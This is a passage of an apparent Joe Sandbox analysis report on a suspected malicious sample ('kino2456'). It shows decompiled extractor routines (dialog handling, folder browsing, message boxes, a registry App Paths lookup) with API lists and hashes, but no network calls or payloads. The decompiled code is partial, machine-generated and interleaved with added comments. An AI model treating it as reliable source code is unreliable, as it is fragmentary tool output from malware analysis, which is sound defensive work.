  • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
  • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
• API String ID: 1002816675-859929227
• Opcode ID: b3702df0e6ccb303bf1eca370cafe7dbdfa8de03ff9db105e5d75263d812a593
• Instruction ID: e396a5e1e6e7cdbff546c31cb9c23059f12fbe6375f0d424aa23b760f17c566b
• Opcode Fuzzy Hash: b3702df0e6ccb303bf1eca370cafe7dbdfa8de03ff9db105e5d75263d812a593
• Instruction Fuzzy Hash: E2512670358701ABE721AB609D1AB7B36DDEB82744F14403DF981D61E1DFF98C81EA22
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
E009634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		 *0x9691d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
                                                                                                                                                                                                                                    				_pop(1);
                                                                                                                                                                                                                                    				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                    				if(_t12 == 0) {
                                                                                                                                                                                                                                    					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                    					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                                                    					_t35 = _a4;
                                                                                                                                                                                                                                    					 *0x968584 = _t35;
                                                                                                                                                                                                                                    					E009643D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                    					__eflags =  *0x968184; // 0x1
                                                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					SetWindowTextA(_t35, "doza2");
                                                                                                                                                                                                                                    					_t17 = CreateThread(0, 0, E00964FE0, 0, 0, 0x968798);
                                                                                                                                                                                                                                    					 *0x96879c = _t17;
                                                                                                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						E009644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						_push(_t35);
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t23 = _t13 - 1;
                                                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                                                    					__eflags = _a12 - 2;
                                                                                                                                                                                                                                    					if(_a12 != 2) {
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					ResetEvent( *0x96858c);
                                                                                                                                                                                                                                    					_t38 =  *0x968584; // 0x0
                                                                                                                                                                                                                                    					_t25 = E009644B9(_t38, 0x4b2, 0x961140, 0, 0x20, 4);
                                                                                                                                                                                                                                    					__eflags = _t25 - 6;
                                                                                                                                                                                                                                    					if(_t25 == 6) {
                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                    						 *0x9691d8 = 1;
                                                                                                                                                                                                                                    						SetEvent( *0x96858c);
                                                                                                                                                                                                                                    						_t39 =  *0x96879c; // 0x0
                                                                                                                                                                                                                                    						E00963680(_t39);
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__eflags = _t25 - 1;
                                                                                                                                                                                                                                    					if(_t25 == 1) {
                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					SetEvent( *0x96858c);
                                                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                    					TerminateThread( *0x96879c, 0);
                                                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    0x00963588
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963590
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963590
                                                                                                                                                                                                                                    0x00963524
                                                                                                                                                                                                                                    0x00963535
                                                                                                                                                                                                                                    0x00963541
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963549
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00963535
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00963541
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0096355F
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00961140,00000000,00000020,00000004), ref: 00963590
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 009635C7
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 009635F1
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 009635F8
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00963610
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00963617
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00963623
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00963637
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00963671
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 2406144884-612509477
                                                                                                                                                                                                                                    • Opcode ID: 12f1566be514fe67073806be8250b375c1b4713af84d278564c8553d801bb792
                                                                                                                                                                                                                                    • Instruction ID: fb24dd5b365148a3cafba592f8d1632be4513ac6f2601f5bc7d146f248da3e3d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12f1566be514fe67073806be8250b375c1b4713af84d278564c8553d801bb792
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7231957125C301BBDB201F25EC4EE2B3A7CE7C6B41F548A1DF616A52A0CBB58901EF55
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E00964224(char __ecx) {
                                                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				char* _t65;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                    				char _t76;
                                                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E009644B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t76 =  *0x9688c0; // 0x0
                                                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                    					 *0x9687a0 = 0;
                                                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                                                    					_v40 = 0x968598;
                                                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                                                    					_v32 = E00964200;
					_v28 = 0x9688c0;
					 *0x96a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x96a288(_t32, 0x9688c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x9688c0 != 0) {
							E00961680(0x9687a0, 0x104, 0x9688c0);
						}
						 *0x96a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x9687a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x9688c0);
					_t61 = 0x9688c0;
					_t4 =  &(_t61[1]); // 0x9688c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x9688c0; // 0x12d1181
					_t44 = CharPrevA(0x9688c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x9688c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

APIs
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00964236
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0096424C
• GetProcAddress.KERNEL32(00000000,000000C3), ref: 00964263
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0096427A
• GetTempPathA.KERNEL32(00000104,009688C0,?,00000001), ref: 0096429F
• CharPrevA.USER32(009688C0,012D1181,?,00000001), ref: 009642C2
• CharPrevA.USER32(009688C0,00000000,?,00000001), ref: 009642D6
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00964391
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 009643A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: 6f9890a659de9fc27d03eacddd001e08104666868bd5d681c81fae0399c3f74f
• Instruction ID: 88012912e58b0a8d3a22b53b36ec917d7b2f3d436276ead17ff1fed55ad7ba4f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f9890a659de9fc27d03eacddd001e08104666868bd5d681c81fae0399c3f74f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 614117B4A04304AFD711AFB4DC98AAF7BB8EB46344F54026EE951A3351CFB58C41DB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 94%
E009644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
	signed int _v8;
	char _v64;
	char _v576;
	void* _v580;
	struct HWND__* _v584;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t34;
	void* _t37;
	signed int _t39;
	intOrPtr _t43;
	signed int _t44;
	signed int _t49;
	signed int _t52;
	void* _t54;
	intOrPtr _t55;
	intOrPtr _t58;
	intOrPtr _t59;
	int _t64;
	void* _t66;
	intOrPtr* _t67;
	signed int _t69;
	intOrPtr* _t73;
	intOrPtr* _t76;
	intOrPtr* _t77;
	void* _t80;
	void* _t81;
	void* _t82;
	intOrPtr* _t84;
	void* _t85;
	signed int _t89;

	_t75 = __edx;
	_t34 =  *0x968004; // 0xf4cc89a0
	_v8 = _t34 ^ _t89; // /GS-style stack cookie: global cookie at 0x968004 XORed with the frame pointer
	_v584 = __ecx;
	_t83 = "LoadString() Error.  Could not load string resource.";
	_t67 = _a4;
	_t69 = 0xd;
	// inline copy of the 53-byte fallback literal into the stack buffer _v64:
	// 13 dwords (rep movsd) plus the terminating byte (movsb)
	_t37 = memcpy( &_v64, _t83, _t69 << 2);
	_t80 = _t83 + _t69 + _t69;
	_v580 = _t37;
	asm("movsb");
	if(( *0x968a38 & 0x00000001) != 0) { // global flag bit set: resource lookup is skipped
		_t39 = 1;
	} else {
		_v576 = 0;
		// string resource ID arrives in EDX (_t75); *0x969a3c holds the HINSTANCE;
		// _v576 is a 0x200-byte (512) stack buffer
		LoadStringA( *0x969a3c, _t75,  &_v576, 0x200);
		if(_v576 != 0) {
			_t73 =  &_v576;
			_t16 = _t73 + 1; // 0x1
			_t75 = _t16;
			do { // inline strlen of the loaded resource string
				_t43 =  *_t73;
				_t73 = _t73 + 1;
			} while (_t43 != 0);
			_t84 = _v580;
			_t74 = _t73 - _t75; // _t74 = length of the loaded string
			if(_t84 == 0) {
				if(_t67 == 0) {
					_t27 = _t74 + 1; // 0x2
					_t83 = _t27;
					_t44 = LocalAlloc(0x40, _t83); // 0x40 == LMEM_FIXED | LMEM_ZEROINIT (LPTR)
					_t80 = _t44;
					if(_t80 == 0) {
						goto L6;
					} else {
						_t75 = _t83;
						_t74 = _t80;
						E00961680(_t80, _t83,  &_v576); // fills the new buffer from _v576 (helper body not in this excerpt)
						goto L23;
					}
				} else {
					_t76 = _t67;
					_t24 = _t76 + 1; // 0x1
					_t85 = _t24;
					do { // inline strlen of the caller-supplied string (_a4)
						_t55 =  *_t76;
						_t76 = _t76 + 1;
					} while (_t55 != 0);
					_t25 = _t76 - _t85 + 0x64; // 0x65
					_t83 = _t25 + _t74; // both string lengths plus 0x64 (100) extra bytes
					_t44 = LocalAlloc(0x40, _t25 + _t74); // LPTR
					_t80 = _t44;
					if(_t80 == 0) {
						goto L6;
					} else {
						E0096171E(_t80, _t83,  &_v576, _t67); // fills the new buffer from _v576 and _a4 (helper body not in this excerpt)
						goto L23;
					}
				}
			} else {
				_t77 = _t67;
				_t18 = _t77 + 1; // 0x1
				_t81 = _t18;
				do { // inline strlen of the caller-supplied string (_a4)
					_t58 =  *_t77;
					_t77 = _t77 + 1;
				} while (_t58 != 0);
				_t75 = _t77 - _t81;
				_t82 = _t84 + 1;
				do { // inline strlen of the string at _v580
					_t59 =  *_t84;
					_t84 = _t84 + 1;
				} while (_t59 != 0);
				_t21 = _t74 + 0x64; // 0x65
				_t83 = _t21 + _t84 - _t82 + _t75; // all three lengths plus 0x64 (100) extra bytes
				_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75); // LPTR
				_t80 = _t44;
				if(_t80 == 0) {
					goto L6;
				} else {
					_push(_v580);
					E0096171E(_t80, _t83,  &_v576, _t67);
					L23:
					MessageBeep(_a12); // _a12 is the MessageBeep uType
					if(E0096681F(_t67) == 0) {
						L25:
						_t49 = 0x10000;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t54 = E009667C9(_t74, _t74);
                                                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(E0096681F(_t67) == 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t66 = E009667C9(0, 0);
                                                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00966CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x0096453f
                                                                                                                                                                                                                                    0x0096453f
                                                                                                                                                                                                                                    0x00964530
                                                                                                                                                                                                                                    0x00964531
                                                                                                                                                                                                                                    0x00964538
                                                                                                                                                                                                                                    0x0096453d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096453d
                                                                                                                                                                                                                                    0x00964554
                                                                                                                                                                                                                                    0x0096455a
                                                                                                                                                                                                                                    0x0096455a
                                                                                                                                                                                                                                    0x0096455a
                                                                                                                                                                                                                                    0x00964525
                                                                                                                                                                                                                                    0x0096468c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 009645A3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 009645E3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0096460D
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00964630
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00964666
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0096466F
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0096686E
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: GetSystemMetrics.USER32(0000004A), ref: 009668A7
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009668CC
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,?,0000000C), ref: 009668F4
                                                                                                                                                                                                                                      • Part of subcall function 0096681F: RegCloseKey.ADVAPI32(?), ref: 00966902
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$doza2
                                                                                                                                                                                                                                    • API String ID: 3244514340-3130468218
                                                                                                                                                                                                                                    • Opcode ID: 4f9e6d8179ce939856277ab1914cbc99675f7f173eef97f0769193dee0c57ad6
                                                                                                                                                                                                                                    • Instruction ID: fd64829142c917db02844ae0aa0a20631a71c43c106245d3a5c5dc5bce2a95ea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f9e6d8179ce939856277ab1914cbc99675f7f173eef97f0769193dee0c57ad6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97511772904219AFDB219FA8CC48BAA7B7DEF86304F144199FD0AB7241DB71DD05DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00962773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                                                    				_t23 =  *0x968004; // 0xf4cc89a0
                                                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t64 = _t62 + 1;
                                                                                                                                                                                                                                    					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                    					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                                                    					_t34 = _v269;
                                                                                                                                                                                                                                    					if(_t34 == 0x53) {
                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                    						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t34 == 0x57) {
                                                                                                                                                                                                                                    							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_push(_t52);
                                                                                                                                                                                                                                    							_v288 = 0x104;
                                                                                                                                                                                                                                    							E00961781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                    							_t59 = 0x104;
                                                                                                                                                                                                                                    							E0096658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                    							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                    								_t59 = _t63;
                                                                                                                                                                                                                                    								E0096658A(_t61, _t63, _v276);
			} else {
				// Read the value (name at 0x961140, not shown in this fragment) into the caller's
				// buffer _t61; _v280 receives the value type, _v288 the byte count.
				if(RegQueryValueExA(_v284, 0x961140, 0,  &_v280, _t61,  &_v288) == 0) {
					_t45 = _v280;
					if(_t45 != 2) {                                  // 2 == REG_EXPAND_SZ
						L9:
						if(_t45 == 1) {                              // 1 == REG_SZ: path accepted as stored
							goto L10;
						}
						// any other value type leaves _t50 == 0: lookup failed
					} else {
						// REG_EXPAND_SZ: expand %VAR% references into the 0x104-byte local buffer.
						// Only a zero return is treated as failure; a required-size return larger
						// than 0x104 is not checked here.
						if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
							_t45 = _v280;                            // re-tests the stored type (2), so L9 cannot reach L10
							goto L9;
						} else {
							_t59 = 0x104;
							E00961680(_t61, 0x104,  &_v268);         // body not shown; reads as a bounded copy of the expanded string back into _t61 (assumption)
							L10:
							_t50 = 1;                                // resolved
						}
					}
				}
				RegCloseKey(_v284);
				L15:
				if(_t50 == 0) {
					goto L16;                                        // not resolved via App Paths
				}
			}
		}
	}
}
// _v8 ^ _t65 matches the /GS stack-cookie check of the epilogue; _t50 carries the result
return E00966CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
}
Instruction addresses for the lines of this function (one per source line, detached from the code by extraction; 0x00000000 marks lines with no backing instruction): 0x00962773 through 0x009628e5.

APIs
